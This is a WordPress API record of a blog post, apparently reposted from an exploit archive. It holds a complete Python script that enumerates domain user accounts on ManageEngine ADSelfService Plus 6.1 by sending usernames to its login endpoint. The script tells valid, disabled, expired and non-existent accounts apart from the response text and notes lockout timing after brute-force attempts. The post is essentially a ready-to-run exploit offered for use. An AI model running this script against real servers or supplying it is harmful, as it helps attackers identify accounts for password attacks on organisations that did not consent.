{"id":23383,"date":"2022-04-19T19:29:55","date_gmt":"2022-04-19T15:29:55","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/166765\/meadssp61-enumerate.txt"},"modified":"2022-05-09T07:50:54","modified_gmt":"2022-05-09T03:20:54","slug":"manageengine-adselfservice-plus-6-1-user-enumeration","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/manageengine-adselfservice-plus-6-1-user-enumeration\/","title":{"rendered":"ManageEngine ADSelfService Plus 6.1 User Enumeration"},"content":{"rendered":"<p dir=\"ltr\"># Exploit Title: ManageEngine ADSelfService Plus 6.1 &#8211; User Enumeration<br \/>\n# Exploit Author: Metin Yunus Kandemir<br \/>\n# Vendor Homepage: https:\/\/www.manageengine.com\/<br \/>\n# Software Link: https:\/\/www.manageengine.com\/products\/self-service-password\/download.html<br \/>\n# Version: ADSelfService 6.1 Build 6121<br \/>\n# Tested Against: Build 6118 &#8211; 6121<br \/>\n# Details: https:\/\/github.com\/passtheticket\/vulnerability-research\/blob\/main\/manage-engine-apps\/adselfservice-userenum.md<\/p>\n<p dir=\"ltr\"># !\/usr\/bin\/python3<br \/>\nimport requests<br \/>\nimport sys<br \/>\nimport time<br \/>\nimport urllib3<br \/>\nfrom urllib3.exceptions import InsecureRequestWarning<\/p>\n<p dir=\"ltr\">&#8220;&#8221;&#8221;<br \/>\nThe domain users can be enumerated like userenum module of the kerbrute tool using this exploit.<br \/>\nIf you conducted a brute-force attack against a user, please run the script after 30 minutes (default settings) otherwise the results can be false positive.<br \/>\n&#8220;&#8221;&#8221;<\/p>\n<p dir=\"ltr\">def request(target, user):<br \/>\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)<br \/>\nurl = target + &#8216;ServletAPI\/accounts\/login&#8217;<br \/>\ndata = {&#8220;loginName&#8221;: user}<br \/>\nheaders = {&#8220;User-Agent&#8221;: &#8220;Mozilla\/5.0 (Windows NT 10.0; rv:78.0) Gecko\/20100101 Firefox\/78.0&#8221;}<br \/>\nreq = requests.post(url, data=data, headers=headers, verify=False)<\/p>\n<p dir=\"ltr\"># For debugging<br \/>\n# print(&#8220;[*] Response for &#8221; + user + &#8220;: &#8221; + req.text.strip())<br \/>\nif &#8216;PASSWORD&#8217; in req.text:<br \/>\nprint(&#8220;[+] &#8221; + user + &#8221; is VALID!&#8221;)<br \/>\nelif &#8216;Your account has been disabled&#8217; in req.text:<br \/>\nprint(&#8220;[+] &#8221; + user + &#8221; account has been DISABLED.&#8221;)<br \/>\nelif &#8216;Your account has expired&#8217; in req.text:<br \/>\nprint(&#8220;[+] &#8221; + user + &#8221; account has EXPIRED.&#8221;)<br \/>\nelif &#8216;Enter the text as shown in the image.&#8217; in req.text:<br \/>\nprint(&#8220;[!] The exploit doesn&#8217;t detect expired and disabled users. Please, run it after the 30 minutes. &#8220;)<br \/>\nelif &#8216;Permission Denied.&#8217; in req.text:<br \/>\nprint(&#8220;[-] &#8221; + user + &#8221; is not found.&#8221;)<\/p>\n<p dir=\"ltr\">def get_users(target, file):<br \/>\ntry:<br \/>\nfile = open(file, &#8220;r&#8221;)<br \/>\nfor line in file:<br \/>\nline = line.strip()<br \/>\ntime.sleep(0.5)<br \/>\nrequest(target, user=line)<br \/>\nexcept FileNotFoundError:<br \/>\nprint(&#8220;[-] File not found!&#8221;)<br \/>\nsys.exit(1)<\/p>\n<p dir=\"ltr\">def main(args):<br \/>\nif len(args) != 3:<br \/>\nprint(&#8220;[*] Usage: %s url usernames_file&#8221; % (args[0]))<br \/>\nprint(&#8220;[*] Example: %s https:\/\/target\/ \/tmp\/usernames.txt&#8221; % (args[0]))<br \/>\nsys.exit(1)<br \/>\nget_users(target=args[1], file=args[2])<\/p>\n<p dir=\"ltr\">if __name__ == &#8220;__main__&#8221;:<br \/>\nmain(args=sys.argv)<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: ManageEngine ADSelfService Plus 6.1 &#8211; User Enumeration # Exploit Author: Metin Yunus Kandemir # Vendor Homepage: https:\/\/www.manageengine.com\/ # Software Link: https:\/\/www.manageengine.com\/products\/self-service-password\/download.html # Version: ADSelfService 6.1 Build 6121 # Tested Against: Build 6118 &#8211; 6121 # Details: https:\/\/github.com\/passtheticket\/vulnerability-research\/blob\/main\/manage-engine-apps\/adselfservice-userenum.md # !\/usr\/bin\/python3 import requests import sys import time import urllib3 from urllib3.exceptions import InsecureRequestWarning &#8220;&#8221;&#8221; &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-23383","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/23383","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=23383"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/23383\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=23383"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=23383"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=23383"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}